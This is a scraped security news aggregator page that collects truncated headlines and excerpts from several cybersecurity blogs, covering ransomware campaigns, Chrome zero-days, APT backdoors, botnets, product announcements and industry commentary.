The attack chain involves the use of impersonation through voice phishing to trick unsuspecting victims into installing remote monitoring and management (RMM) tools, followed by the delivery of QakBot, Cobalt Strike, and ultimately Black Basta ransomware.

Storm-1811 then uses PsExec to deploy Black Basta ransomware throughout the network."

It is "distributed by a small number of threat actors who typically rely on other threat actors for initial access, malicious infrastructure, and malware development," the company said.

Organizations a…

2 days, 5 hours ago @ thehackernews.com
Google Patches Yet Another Actively Exploited Chrome Zero-Day Vulnerability

Google has rolled out fixes to address a set of nine security issues in its Chrome browser, including a new zero-day that has been exploited in the wild.

Assigned the CVE identifier CVE-2024-4947, the vulnerability relates to a type confusion bug in the V8 JavaScript and WebAssembly engine.

Type confusion vulnerabilities arise when a program attempts to access a resource with an incompatible type.

It can have serious impacts as it allows threat actors to perform out-of-bounds memory access, cause a crash, and execute arbitrary code.

The development marks the third zero-day that Google has patched within a week after CVE-2024-4671 and CVE-2024-4761.

2 days, 6 hours ago @ thehackernews.com
FBI Seizes BreachForums Again, Urges Users to Report Criminal Activity

The website ("breachforums[.

It's worth noting a prior iteration of BreachForums, hosted at breached.vc/.to/.co and managed by pompompurin, was seized by law enforcement in late June 2023.

"The BreachForums website has been taken down by the FBI and DOJ with assistance from international partners."

If you have information to report about cyber criminal activity on BreachForums, please contact us: t.me/fbi_breachforums [email protected] breachforums.ic3.gov."

BreachForums emerged in March 2022 following the law enforcement dismantling of RaidForums and the arrest of its owner "Omnipotent."

2 days, 15 hours ago @ thehackernews.com
Android 15 Rolls Out Advanced Features to Protect Users from Scams and Malicious Apps

Google is unveiling a set of new features in Android 15 to prevent malicious apps installed on the device from capturing sensitive data.

"This is helpful for apps that want to hide sensitive information from other apps and protect users from scams."

"We recently began piloting enhanced fraud protection with Google Play Protect, in countries where internet-sideloaded malicious app installs are prevalent.

"If suspicious behavior is discovered, Google Play Protect can send the app to Google for additional review and then warn users or disable the app if malicious behavior is confirmed."

Live threat detection also builds on a recently added capability that allows for real-time scanning at the c…

2 days, 16 hours ago @ thehackernews.com
Google Launches AI-Powered Theft and Data Protection Features for Android Devices

Google has announced a slew of privacy and security features in Android, including a suite of advanced protection features to help secure users' devices and data in the event of a theft.

These features aim to help protect data before, during and after a theft attempt, the tech giant said, adding they are expected to be available via an update to Google Play services for devices running Android versions 10 and later.

Another noteworthy addition is an upgrade to factory reset that effectively makes a stolen device useless.

"This renders a stolen device unsellable, reducing incentives for phone theft."

Also coming to Android 10+ devices is an Offline Device Lock that locks the device screen if…

2 days, 16 hours ago @ thehackernews.com
Turla Group Deploys LunarWeb and LunarMail Backdoors in Diplomatic Missions

An unnamed European Ministry of Foreign Affairs (MFA) and its three diplomatic missions in the Middle East were targeted by two previously undocumented backdoors tracked as LunarWeb and LunarMail.

Earlier this year, the cyber espionage group was discovered attacking Polish organizations to distribute a backdoor named TinyTurla-NG (TTNG).

LunarWeb is equipped to gather system information and parse commands inside JPG and GIF image files sent from the C&C server, following which the results are exfiltrated back in a compressed and encrypted format.

The second implant, LunarMail, supports similar capabilities, but notably piggybacks on Outlook and uses email for communication with its C&C serv…

2 days, 20 hours ago @ thehackernews.com
(Cyber) Risk = Probability of Occurrence x Damage

CVSS evaluates vulnerabilities based on various criteria, utilizing metrics with predefined options for each metric.

, enabling more accurate detection and response to potential threats by correlating network events with known vulnerabilities.

More Than the Known Vulnerabilities. While EDR excels at blocking known vulnerabilities, NDR extends its capabilities to zero-day attacks and unknown threat vectors.

CVSS acts as a crucial element in effective risk management, offering a standardized framework for evaluating vulnerabilities based on their severity.

Leveraging CVSS scores, NDR offers granular risk assessment and prioritizes alerts based on vulnerability severity, ensuring swift responses…

2 days, 21 hours ago @ thehackernews.com
threatpost
last post: none
DarkReading
last post 5 months, 3 weeks ago
Cyber Threats to Watch Out for in 2024

5 months, 3 weeks ago @ darkreading.com
CISA, NCSC Offer a Road Map, Not Rules, in New Secure AI Guidelines

5 months, 3 weeks ago @ darkreading.com
Ardent Health Hospitals Disrupted After Ransomware Attack

5 months, 3 weeks ago @ darkreading.com
General Electric, DARPA Hack Claims Raise National Security Concerns

5 months, 3 weeks ago @ darkreading.com
Hamas-Linked APT Wields New SysJoker Backdoor Against Israel

5 months, 3 weeks ago @ darkreading.com
Data De-Identification: Balancing Privacy, Efficacy & Cybersecurity

5 months, 3 weeks ago @ darkreading.com
Balancing Simplicity and Security in the Digital Experience

5 months, 3 weeks ago @ darkreading.com
Hack The Box Launches 5th Annual University CTF Competition

5 months, 3 weeks ago @ darkreading.com
Fake Browser Updates Targeting Mac Systems With Infostealer

5 months, 3 weeks ago @ darkreading.com
Kiteworks' Maytech Acquisition Reaffirms Commitment to UK Market

5 months, 3 weeks ago @ darkreading.com
Generative AI Takes on SIEM

5 months, 3 weeks ago @ darkreading.com
Web Shells Gain Sophistication for Stealth, Persistence

5 months, 3 weeks ago @ darkreading.com
Qatar Cyber Agency Runs National Cyber Drills

5 months, 3 weeks ago @ darkreading.com
Researchers Undermine 'Windows Hello' on Lenovo, Dell, Surface Pro PCs

5 months, 3 weeks ago @ darkreading.com
Mideast Oil & Gas Facilities Could Face Cyber-Related Energy Disruptions

5 months, 3 weeks ago @ darkreading.com
WeLiveSecurity
last post 16 hours ago
The who, where, and how of APT attacks – Week in security with Tony Anscombe

This week, ESET experts released several research publications that shine the spotlight on a number of notable campaigns and broader developments on the threat landscape.

This week, ESET experts released several research publications that shone the spotlight on a number of notable attacks and broader developments on the threat landscape.

First, their new APT Activity Report reviewed the key aspects of sophisticated attacks as investigated by ESET researchers from October 2023 to March 2024 and looked at the targeted countries and industry verticals, along with the initial access methods and sources of these attacks.

In other research, ESET's experts found two previously unknown backdoors – wh…

16 hours ago @ welivesecurity.com
To the Moon and back(doors): Lunar landing in diplomatic missions

Key points of the blogpost: ESET Research discovered two previously unknown backdoors – LunarWeb and LunarMail – used in the compromise of a European MFA and its diplomatic missions.

Additionally, evidence of spearphishing includes a Word document installing a LunarMail backdoor via a malicious macro.

This document has unusual components: 32- and 64-bit versions of a Stage 1 loader, and a Stage 2 blob containing the LunarMail backdoor.

The security checks include a limit of initial contact attempts with the C&C server, assessing the backdoor’s lifespan, and checking C&C server accessibility.

Information collection

On first run, the LunarMail backdoor collects the following information: enviro…

2 days, 23 hours ago @ welivesecurity.com
Ebury is alive but unseen: 400k Linux servers compromised for cryptocurrency theft and financial gain

Ebury, Ebury everywhere

This paper reveals new methods used to propagate Ebury to new servers.

Ebury operators leverage existing Ebury-compromised servers in the same network segment as their target to perform ARP spoofing.

Combined, about 400,000 servers have been compromised by Ebury since 2009, and more than 100,000 were still compromised as of late 2023.

Multiple malware families deployed on Ebury-infested servers and the impact for potential victims

Hiding deeper

The Ebury malware family itself has also been updated.

The new paper, Ebury is alive but unseen: 400k Linux servers compromised for cryptocurrency theft and financial gain, goes into more details about each of Ebury’s aspects, in…

3 days, 22 hours ago @ welivesecurity.com
ESET APT Activity Report Q4 2023–Q1 2024

An overview of the activities of selected APT groups investigated and analyzed by ESET Research in Q4 2023 and Q1 2024

ESET APT Activity Report Q4 2023–Q1 2024 summarizes notable activities of selected advanced persistent threat (APT) groups that were documented by ESET researchers from October 2023 until the end of March 2024.

In this report, we also introduce a new China-aligned APT group, CeranaKeeper, distinguished by unique traits yet possibly sharing a digital quartermaster with the Mustang Panda group.

Malicious activities described in ESET APT Activity Report Q4 2023–Q1 2024 are detected by ESET products; shared intelligence is based mostly on proprietary ESET telemetry data and has …

3 days, 22 hours ago @ welivesecurity.com
How to talk about climate change – and what motivates people to action: An interview with Katharine Hayhoe

“When I talk about climate change with people, I spend hardly any time on the science of climate change,” says Katharine Hayhoe, a leading climate science communicator and a speaker at Starmus Earth: The Future of Our Home Planet.

Climate Scientist – Distinguished Professor at Texas Tech University – Chief Scientist for The Nature Conservancy

Katharine Hayhoe is an atmospheric scientist who studies how climate change impacts us and how we can effectively respond.

On that note, another interesting remark you've made is, "How do you talk to someone who doesn’t believe in climate change?"

So, how do you get someone who says that we can’t possibly know that humans are causing climate change or b…

1 week ago @ welivesecurity.com
In it to win it! WeLiveSecurity shortlisted for European Security Blogger Awards

We’re thrilled to announce that WeLiveSecurity has been named a finalist in the Corporates – Best Cybersecurity Vendor Blog category of the European Security Blogger Awards 2024.

We’re grateful for this nomination, which we see as a reflection of the talents and efforts of ESET’s security researchers and content creators.

This is actually where you, our readers, can help – your show of support could make all the difference in helping us win once again!

If you enjoy what you read, see and hear on WeLiveSecurity, pleas…

1 week ago @ welivesecurity.com
It's a wrap! RSA Conference 2024 highlights – Week in security with Tony Anscombe

More than 40,000 security experts descended on San Francisco this week.

Let's now look back on some of the event's highlights – including the CISA-led 'Secure by Design' pledge also signed by ESET.

More than 40,000 security professionals descended on San Francisco this week to attend one of the industry's key events.

Predictably, AI was the main talk of the town, but there was another hot topic – software security.

Importantly, the event saw the signing of the Secure by Design pledge by the world's biggest software manufacturers.

Watch Tony's video to find out and learn more about the pledge from the launch event and on CISA's website.

1 week ago @ welivesecurity.com
RSA Conference 2024: AI hype overload

This hearkens back to the heady days where security software marketers swamped the floor with AI and claimed it would solve every security problem – and maybe world hunger.

We never stopped doing the hard work.

We’ve been using AI for decades in one form or another, but simply viewed it as another tool in the toolbox – which is what it is.

AI contains a form of understanding, but not really the way you think of it.

But security will still be hard – really hard – and both sides just stepped up, not eliminated, the game.

1 week, 1 day ago @ welivesecurity.com
How to inspire the next generation of scientists | Unlocked 403: Cybersecurity podcast

As Starmus Earth draws near, we caught up with Dr. Garik Israelian to celebrate the fusion of science and creativity and venture where imagination flourishes and groundbreaking ideas take flight

Some time ago, we briefly spoke to Dr. Garik Israelian, one of the founders of the Starmus Festival, to hear his views mainly about the festival's mission.

The event is now just days away and we caught up with Dr. Israelian, an astrophysicist and the visionary force behind the festival, again to celebrate the fusion of science and creativity and the boundless possibilities born from this convergence.

Join host Alžbeta Kovaľová as she speaks to Dr. Israelian about:
the festival's primary mission
the con…

1 week, 3 days ago @ welivesecurity.com
The hacker’s toolkit: 4 gadgets that could spell security trouble

These gadgets are designed to help identify and prevent security woes, but what if they fall into the wrong hands?

There are a bunch of popular geeky gadgets with endearing names that provide valuable functionality for hobbyist hackers and security professionals alike.

Originally designed to aid penetration testers and other security professionals in automating their tasks, these plug-and-play gadgets can wreak havoc in mere minutes.

All scripting functionalities available in the Rubber Ducky can also be found in the Bash Bunny.

That said, the Bash Bunny still ups the ante further.

1 week, 4 days ago @ welivesecurity.com
Pay up, or else? – Week in security with Tony Anscombe

The facility had to take all its computers and systems offline and reschedule non-emergency procedures and appointments in the aftermath of the attack.

The gang has also released what it says are samples of data stolen during the attack.

More broadly, what are the motivations behind paying, or not paying, ransom fees?

Indeed, should you pay up, and how does cyber-insurance come into play?

2 weeks ago @ welivesecurity.com
Adding insult to injury: crypto recovery scams

Imagine an even worse outcome: you are approached by someone or see an advert offering cryptocurrency recovery services.

Unfortunately, this type of “recovery fraud” is increasingly common, and even the FBI issued a Public Service Announcement (PSA) about it last year.

How do crypto recovery scams work?

Sample messages peddling cryptocurrency recovery services in discussion forums

Some crypto recovery scammers are advertising their wares via low-cost online press release distribution services.

Avoiding crypto theft

Granted, the best way to avoid crypto recovery scams is not to have your digital currency stolen in the first place.

2 weeks, 1 day ago @ welivesecurity.com
MDR: Unlocking the power of enterprise-grade security for businesses of all sizes

Considering the potential influences of these responsibilities on business functions, it’s prudent to open a conversation about offloading certain tasks through an MDR service.

Additionally, the service also includes all modules of ESET PROTECT Elite, the ESET MDR service, and ESET Premium Support Essential.

An MDR service offers a comprehensive solution in a unified experience.

As such, these days, it is not only businesses themselves that acknowledge the need for robust cybersecurity solutions.

For enterprises looking to elevate their security posture, ESET PROTECT MDR Ultimate offers proactive prevention with superior protection and, through a tailor-fit security service, enables granula…

2 weeks, 3 days ago @ welivesecurity.com
Why space exploration is important for Earth and its future: Q&A with David Eicher

David J. Eicher (born August 7, 1961) is an American editor, writer, and popularizer of astronomy and space.

This is of course a very critical time to always remember the question of the future of our home planet.

We take Earth as a habitat and our life on Earth for granted.

Some argue that it doesn't make sense to explore the depths of space when we need to address serious problems here on Earth.

What do you think are the greatest benefits of what we have already learned about the universe and space?

2 weeks, 4 days ago @ welivesecurity.com
Major phishing-as-a-service platform disrupted – Week in security with Tony Anscombe

The investigation uncovered at least 40,000 phishing domains that were linked to LabHost and tricked victims into handing over their sensitive details

One of the world’s largest phishing-as-a-service (PhaaS) platforms known as LabHost has been disrupted in a global law enforcement operation, Europol has announced.

Some 10,000 people across the world used the service, with the monthly fee averaging $249.

The investigation uncovered at least 40,000 phishing domains that were linked to LabHost and tricked users into handing over their sensitive details.

Learn more about the sting in the video – and make sure you know how to avoid falling victim to a phishing attack.

In other cybercrime news, US…

3 weeks ago @ welivesecurity.com
Naked Security
last post 7 months, 3 weeks ago
Update on Naked Security

Dear Naked Security readers,

Firstly, thank you for your interest, your time, and your contributions to the Naked Security community.

We have recently added the extensive catalog of Naked Security articles to the Sophos News blog platform, enabling us to provide all Sophos security research, insights, and intelligence in a single location.

We are redirecting articles from Naked Security to Sophos News and you can continue to access the Naked Security article library whenever you need it.

You can find their articles in the Security Operations, Threat Research and AI Research sections of this blog.

Whether you’re a threat hunter, security administrator, IT/security generalist, home user or mor…

7 months, 3 weeks ago @ news.sophos.com
Mom’s Meals issues “Notice of Data Event”: What to know and what to do

8 months, 3 weeks ago @ nakedsecurity.sophos.com
S3 Ep149: How many cryptographers does it take to change a light bulb?

8 months, 3 weeks ago @ nakedsecurity.sophos.com
Using WinRAR? Be sure to patch against these code execution bugs…

8 months, 4 weeks ago @ nakedsecurity.sophos.com
Smart light bulbs could give away your password secrets

8 months, 4 weeks ago @ nakedsecurity.sophos.com
“Snakes in airplane mode” – what if your phone says it’s offline but isn’t?

9 months ago @ nakedsecurity.sophos.com
S3 Ep148: Remembering crypto heroes

9 months ago @ nakedsecurity.sophos.com
FBI warns about scams that lure you in as a mobile beta-tester

9 months ago @ nakedsecurity.sophos.com
“Grab hold and give it a wiggle” – ATM card skimming is still a thing

9 months ago @ nakedsecurity.sophos.com
Crimeware server used by NetWalker ransomware seized and shut down

9 months, 1 week ago @ nakedsecurity.sophos.com
S3 Ep147: What if you type in your password during a meeting?

9 months, 1 week ago @ nakedsecurity.sophos.com
Microsoft Patch Tuesday: 74 CVEs plus 2 “Exploit Detected” advisories

9 months, 1 week ago @ nakedsecurity.sophos.com
Help Net Security
last post 21 hours ago
US exposes scheme enabling North Korean IT workers to bypass sanctions

The US Justice Department has unsealed charges against a US woman and a Ukrainian man who, along with three unidentified foreign nationals, have allegedly helped North Korean IT workers work remotely for US companies under assumed US identities and thus evade sanctions.

“Some of these companies were purposely targeted by a group of DPRK IT workers, who maintained postings for companies at which they wanted to insert IT workers,” the DOJ says.

According to the State Department, this scheme went on from October 2020 to 2023 and generated at least $6.8 million for the DPRK.

How to identify North Korean IT workers

US authorities have been warning about North Korean hackers posing as IT freelancer…

21 hours ago @ helpnetsecurity.com
The importance of access controls in incident response

The worst time to find out your company doesn’t have adequate access controls is when everything is on fire.

That’s why having adequate identity access management (IAM) policies in place – which include both authorization (AuthZ) and authentication (AuthN) – is especially critical when it comes to your incident management tooling.

It’s the role of security teams to work together with platform teams to ensure that the appropriate access controls are in place.

You don’t want to be in a situation where access is granted off the cuff or where someone should already have access and doesn’t.

Considerations for incident management

Whatever incident management solution you choose, you need to ensure…

23 hours ago @ helpnetsecurity.com
Kroll expands its document review capabilities to accelerate incident response

Kroll expands its document review capabilities with DataminerAI to immediately pinpoint where sensitive data is located, providing faster, more efficient and affordable data mining.

The technology optimizes incident response investigations and is available to all insurance carriers, law firms, and incident response providers seeking more efficient document review.

It leverages large language models (LLM) to rapidly analyze data sets of all sizes to find sensitive data and categorize it for immediate analysis, extraction and review.

DataminerAI provides customized workflows based on its findings and delivers solutions which reduce the need for manual review.

This saves time and money typical…

1 day, 1 hour ago @ helpnetsecurity.com
GitLab unveils AI capabilities to help organizations better secure their software

GitLab announced new innovations across the platform to streamline how organizations build, test, secure, and deploy software.

Introducing GitLab Duo Enterprise

GitLab Duo Enterprise, a new end-to-end AI add-on, combines the developer-focused AI capabilities of GitLab Duo Pro—organizational privacy controls, code suggestions, and chat—with enterprise-focused AI capabilities to help organizations proactively detect and fix security vulnerabilities, summarize issue discussions and merge requests, resolve CI/CD bottlenecks and failures, and enhance team collaboration.

Organizations can customize GitLab Duo with context from their software projects for model personalization.

Additionally, GitLab…

1 day, 2 hours ago @ helpnetsecurity.com
The IT skills shortage situation is not expected to get any better

A growing IT skills shortage is impacting organizations in all industries and across all regions, according to IDC.

And the situation is not expected to get any better.

And a variety of cloud skills, including architecture, data management and storage, and software development, are among the ten most needed skills identified by survey respondents.

This situation is further compounded by the need for additional, non-technical skills, such as digital business skills, human skills, and leadership skills.

“Getting the right people with the right skills into the right roles has never been so difficult,” says Gina Smith, PhD, research director for IDC’s IT Skills for Digital Business practice.

1 day, 4 hours ago @ helpnetsecurity.com
Organizations struggle to defend against ransomware

In this Help Net Security video, Jeremy Nichols, Director, Global Threat Intelligence Center at NTT Security Holdings, discusses a recent surge in ransomware incidents.

After a down year in 2022, ransomware and extortion incidents increased in 2023.

More than 5,000 ransomware victims were detected or posted across multiple social channels up from approximately 3,000 in 2022, according to the 2024 Global Threat Intelligence Report by NTT Security Holdings.

Other key findings:

1 day, 5 hours ago @ helpnetsecurity.com
Too many ICS assets are exposed to the public internet

The enterprise attack surface is expanding in multiple ways, becoming more numerous and more specific, according to runZero.

IT and OT are converging, expanding the attack surface of organizations and requiring new techniques to discover and manage assets.

Over 7% of the ICS assets sampled are exposed to the public internet.

These assets include programmable logic controllers, power meters, and protocol gateways, all of which play an important role in critical infrastructure.

Server Message Block (SMB) v1 is still enabled on 13% of Windows systems.

1 day, 5 hours ago @ helpnetsecurity.com
New infosec products of the week: May 17, 2024

Here’s a look at the most interesting products from the past week, featuring releases from Calix, FireMon, ManageEngine, and OWASP Foundation.

Updates include new security alerts and heightened cybersecurity reporting across primary, staff, and point of sale (POS) managed networks.

BLint: Open-source tool to check the security properties of your executables

BLint is a Binary Linter designed to evaluate your executables’ security properties and capabilities, utilizing LIEF for its operations.

OWASP dep-scan: Open-source security and risk audit tool

OWASP dep-scan is an open-source security and risk assessment tool that leverages information on vulnerabilities, advisories, and licensing restric…

1 day, 6 hours ago @ helpnetsecurity.com
Critical Git vulnerability allows RCE when cloning repositories with submodules (CVE-2024-32002)

New versions of Git are out, with fixes for five vulnerabilities, the most critical (CVE-2024-32002) of which can be used by attackers to remotely execute code during a “clone” operation.

It can be installed on machines running Windows, macOS, Linux, and various *BSD distributions.

Visual Studio, Microsoft’s integrated development environment, has Git tooling (MinGit) built directly into it, and other IDEs rely on it.

CVE-2024-32002 and other fixed vulnerabilities

CVE-2024-32002 is a critical vulnerability that allows specially crafted Git repositories with submodules to trick Git into writing files into a .git/ directory instead of the submodule’s worktree.

If you cannot update immediately,…

1 day, 21 hours ago @ helpnetsecurity.com
Google fixes third exploited Chrome zero-day in a week (CVE-2024-4947)

For the third time in the last seven days, Google has fixed a Chrome zero-day vulnerability (CVE-2024-4947) for which an exploit exists in the wild.

Google does not usually share details about fixed vulnerabilities, and even refrains from saying whether the existing exploit for them is being leveraged or not.

Still, Berdnikov and Larin being researchers with Kaspersky’s Global Research & Analysis Team, chances are good that they spotted the vulnerability being actively exploited.

CVE-2024-4947 has been fixed in Chrome 125.0.6422.60/.61 (for Windows and Mac) and 125.0.6422.60 (for Linux), along with three additional vulnerabilities.

Depending on the privileges associated with the user an attacker …

2 days ago @ helpnetsecurity.com
Palo Alto Networks partners with IBM to deliver AI-powered security offerings

Palo Alto Networks and IBM announced a broad-reaching partnership to deliver AI-powered security outcomes for customers.

“Strategic partnerships like the one we’re announcing today with Palo Alto Networks bring with them significant benefits across the industry.

We’ll deliver these capabilities with Palo Alto Networks, and accelerate our security investments and innovation in areas like data security and identity and access management.

Together, Palo Alto Networks and IBM will accelerate consultant training, enabling more than 1,000 IBM experts to provide optimal migration, deployment, and adoption services across Palo Alto Networks platforms.

watsonx will help Palo Alto Networks proactivel…

2 days, 1 hour ago @ helpnetsecurity.com
Is an open-source AI vulnerability next?

Even if a major open-source AI project hasn’t already been compromised, it’s only a matter of time until it is.

So, let’s explore why open-source AI security is lacking and what security professionals can do to improve it.

Recent research indicates an inverse relationship between the security posture of open-source AI software tools and their popularity.

Put simply, the more widely adopted an open-source AI tool or model, the greater the security vulnerabilities it may possess.

Furthermore, the prevalence of open-source AI models trained on potentially illegal or unethical data poses significant legal and regulatory risks for users.

2 days, 3 hours ago @ helpnetsecurity.com
OWASP dep-scan: Open-source security and risk audit tool

OWASP dep-scan is an open-source security and risk assessment tool that leverages information on vulnerabilities, advisories, and licensing restrictions for project dependencies.

It supports local repositories and container images as input sources, making it suitable for integration with ASPM/VM platforms and use in CI environments.

OWASP dep-scan features
Caroline Russell, Staff Security Engineer at AppThreat, outlines the most important features:
Depscan utilizes cdxgen to produce Software Bill-of-Materials (SBOMs), which allows us to support many different languages and source code configurations.
It offers result exports into customizable Jinja reports as well as JSON documents in a couple …

2 days, 4 hours ago @ helpnetsecurity.com
Ebury botnet compromises 400,000+ Linux servers

It is still growing and has seen hundreds of thousands of compromised servers in its at least 15-year-long operation.

The Ebury group and botnet have been involved in the spread of spam, web traffic redirections, and credential stealing over the years.

In many cases, Ebury operators could gain full access to large servers of ISPs and well-known hosting providers.

There is no geographical boundary to Ebury; there are servers compromised with Ebury in almost all countries in the world.

Whenever a hosting provider was compromised, it led to a vast number of compromised servers in the same data centers.

2 days, 4 hours ago @ helpnetsecurity.com
Product showcase: Block ads, cookie pop-ups, trackers with CleanWeb

By eliminating intrusive ads, trackers, and cookie notifications, CleanWeb ensures a smoother, faster, and more enjoyable browsing experience that no longer comes at the cost of personal privacy.

It comes with a VPN subscription at no extra cost and can be accessed via a browser extension or the app.

Besides blocking browser ads and banners, the ad blocker can block video ads.

It’s worth mentioning that all four functionalities are available only via the Surfshark browser extension and work only on a browser level.

That’s where CleanWeb steps in, shielding you from ads, cookie pop-ups, and even malware & data breaches.

2 days, 5 hours ago @ helpnetsecurity.com
IT Security Guru
last post 1 day, 15 hours ago
#MIWIC2024 One To Watch: Valeen Oseh-Ovarah, Founder and CEO of TisOva

Currently, as the founder of my cybersecurity startup, TisOva, I am deeply invested in our mission to protect students from online scams.

Beyond my role as a founder, I am deeply committed to advancing cybersecurity through mentorship and advocacy.

Don’t hesitate to ask for help or seek out mentorship opportunities when needed.

One of the prevailing misconceptions in cybersecurity is the belief that older people are more susceptible to online scams.

Secondly, I wish I had known earlier in my cybersecurity journey that not every aspect of cybersecurity is a perfect fit for me.

1 day, 15 hours ago @ itsecurityguru.org
Cato Networks Partners with e& Further Expanding Global SASE Platform with New UAE PoP

By leveraging SmartHub data center’s state-of-the-art infrastructure and strategic location, Cato reaffirms its commitment to providing businesses with cutting-edge SASE solutions that empower their growth and global presence.

“Our partnership with e& provides organisations with unparalleled connectivity and a seamless network security stack, setting a new standard in flexibility and agility.

Organisations today require the efficiency and effectiveness of a cloud-native platform, delivering a comprehensive network and security infrastructure within minutes and hours.

The Cato SASE Cloud Platform offers unmatched control and visibility, allowing a seamless connection from any edge to any ser…

1 day, 19 hours ago @ itsecurityguru.org
Most Companies Affected by Software Supply Chain Attacks in the Last Year, Struggling to Detect and React Effectively

Over the past year, a significant portion of global organisations (54%) experienced software supply chain attacks, with many struggling to adapt to the escalating risk environment.

These findings stem from ‘The State of Software Supply Chain Security Risk’ report, released today by Synopsys in collaboration with the Ponemon Institute.

Moreover, only 38% consider the current resources allocated to supply chain security adequate.

“Attackers are getting more sophisticated and thus finding more weaknesses that allow them to explore a supply chain where they can steal sensitive data, plant malware, and control systems.

To learn more, download a copy of “The State of Software Supply Chain Securit…

1 day, 19 hours ago @ itsecurityguru.org
Advanced Cyber Defence Systems Joins Elite Group in Signing CISA’s Secure by Design Pledge

Advanced Cyber Defence Systems (ACDS) has today joined the US Cybersecurity & Infrastructure Security Agency’s (CISA) and UK National Cyber Security Centre’s (NCSC) Secure by Design pledge, becoming one of the first 100 companies, alongside AWS, Microsoft, Google, Cisco, and IBM, to commit to enhancing product security within a year.

Developing more secure software from the outset aims to thwart these and other threats, from nation state actors as well as criminal groups.

This may involve taking action on all products or starting with a selected set and publishing a roadmap for others.

Elliott Wilkes, CTO at Advanced Cyber Defence Systems, says: “For ACDS, signing the Secure by Design pledg…

1 day, 19 hours ago @ itsecurityguru.org
Building a diverse and inclusive cyber workforce

For far too long cyber security was seen as a man’s sport.

Cyber security is all about problem-solving.

Instead, they are bolstering their security teams with problem solvers, multi-taskers, born-leaders, each from varying backgrounds, not just previous roles in cyber.

They are also recognising that security teams need to be diverse to achieve cyber resilience.

To tackle today’s evolving cyber threats, we need the perspectives of everyone in society, not just a subset.

1 day, 20 hours ago @ itsecurityguru.org
Public Sector IT is Broken: Turning the System Back On

The UK’s public sector, unfortunately, stands first in line to receive many of these attacks.

Bracing for escalating cybersecurity threats
There is no question that the UK’s public sector organisations are facing an increase in security threats.

And, importantly, what is the best way to generate best practice throughout the public sector to mitigate risk?

The public sector is routinely charged three times as much as the private sector for equivalent IT deployments.

Conclusion
This entire broken IT system is frustrating for the public and public sector organisations – additionally, it is enormously frustrating for IT vendors with the expertise to deliver lower cost, secure systems.

1 day, 22 hours ago @ itsecurityguru.org
#MIWIC2024 One To Watch: Jenny McCullagh, Graduate Cybersecurity Engineer at Leonardo and Co-Founder and Director of CyberWomen Groups C.I.C

My role as a Co-Founder and Director of CyberWomen Groups C.I.C.

Further, I am passionate about enhancing the cybersecurity experience for future cyber professionals coming through university.

Concurrently, as a graduate cybersecurity engineer at Leonardo, I aim to enhance my skill set and explore the different areas of cyber.

To make a change and to empower women studying cybersecurity, I, as part of a team, co-founded the initiative CyberWomen@Warwick.

Alongside this, I am a graduate cybersecurity engineer at Leonardo, where I continue to develop my skills and contribute meaningfully to the ever-evolving landscape of cybersecurity.

2 days, 17 hours ago @ itsecurityguru.org
Expert Insight: How Diverse Leadership Can Benefit the Security Sector

In today’s business landscape, diverse leadership is essential for driving innovation, improving decision-making, and maintaining a competitive advantage.

This has caused many organisations within the industry to have all-male leadership, which can in turn create a culture of bias.

Whilst cybersecurity is still male-dominated, we’re starting to see positive changes regarding female representation in leadership positions – with 28% of women currently holding C-suite positions globally.

The tangible benefits of diverse leadership
Due to the increased need for innovation and creativity in the cybersecurity industry, it’s even more significant to establish a progressive culture.

STEM businesses …

2 days, 17 hours ago @ itsecurityguru.org
Commonly used passwords for new accounts include “User” & “Welcome”

The findings from Specops Software, an Outpost24 company, come from an analysis of 651 million compromised passwords, which highlighted a list of 120,000 commonly used passwords for new team members.

Other common terms found were “guest”, “starter”, and “logon”, which highlights a serious issue with these phrases being used as security credentials.

Stronger passwords are vital; otherwise, hackers can crack weak passwords in a matter of minutes.

These passwords are usually generated by the IT team, and in theory, should be as strong as any other password.

Unfortunately, many organizations do not follow the best practices for password security, such as using long and random passphrases.

2 days, 21 hours ago @ itsecurityguru.org
Expert Insight: What’s the key to bringing more diversity into the tech sector?

It’s a narrative that regularly gets repeated as a part of the conversation about diversity in tech.

But, while small steps have been taken to balance the scales, women and non-binary individuals are still vastly outnumbered in these industries.

Widening the talent pool
To broaden their talent pool, businesses within the tech industry should be identifying new recruits through more alternative channels.

Discovering this untapped talent – and keeping hold of it – is exactly what the tech sector needs.

Personally, I’m passionate about encouraging more women and non-binary individuals to get into IT and cybersecurity – and to remain there throughout their careers.

3 days, 22 hours ago @ itsecurityguru.org
#MIWIC2024: Jan Carroll, Managing Director at Fortify Institute

How did you get into the cybersecurity industry?

This ethos would later lead me to found Fortify Institute, with a mission to make cybersecurity education available to all.

I’m constantly striving to do more in supporting women and increasing diversity in the tech and cybersecurity industry.

What is one piece of advice you would give to girls/women looking to enter the cybersecurity industry?

Don’t hesitate—dive into the cybersecurity industry with enthusiasm.

3 days, 22 hours ago @ itsecurityguru.org
CIOs and CFOs, two parts of the same whole

CFOs, the keepers of the bottom line, are driven by profitability, whereas CIOs are tasked with achieving technology goals to drive operational efficiency, as well as translating the complex language of digital security to the board.

CIOs need tools and technology to keep up, but this requires complete business buy-in.

There is real opportunity for CIOs and CFOs to collaborate closely, aligning technology investments with financial goals, mitigating risks, improving decision-making, and enhancing overall operational efficiency.

However, before they can do this, CIOs need complete visibility of the entire digital infrastructure.

With real time analytics – powered by automation – the CFO’s an…

1 week, 1 day ago @ itsecurityguru.org
TrustRadius recognises KnowBe4 for fifth year running in Security Awareness Training

KnowBe4, the provider of the world’s largest security awareness training and simulated phishing platform, announced that TrustRadius has recognised KnowBe4’s Security Awareness Training and PhishER with 2024 Top Rated Awards.

KnowBe4’s Security Awareness Training won in the Security Awareness Training category and PhishER won in Incident Response, Security Orchestration, Automation and Response and the Phishing Detection and Response categories.

With a TrustRadius Score of 9 out of 10 and over 1033 verified reviews, KnowBe4’s Security Awareness Training is recognized by their customer reviews as a top player in the Security Awareness Training software category for the fifth consecutive time…

1 week, 2 days ago @ itsecurityguru.org
How Tech Can Help you Obtain a Building Passport: Net-Zero Building Certification Guide

This guide will outline step by step what you need to know about obtaining and maintaining your own net-zero building certification.

Analyze Your Building’s Energy Performance
To get a certification for net-zero building, it is important that you evaluate how your building uses energy at present.

Design a Strategy for Energy Efficiency
To create an effective energy efficiency strategy for your net-zero building, concentrate on four main areas: 1.

Renew Certification – Most net-zero building certifications require periodic renewal, typically every few years.

Leverage Your Net-Zero Building Certification
Exhibit your commitment to sustainability in promotional activities.

1 week, 2 days ago @ itsecurityguru.org
Expert Insight: ‘Minding the gap’: how can we work to make cyber accessible for women?

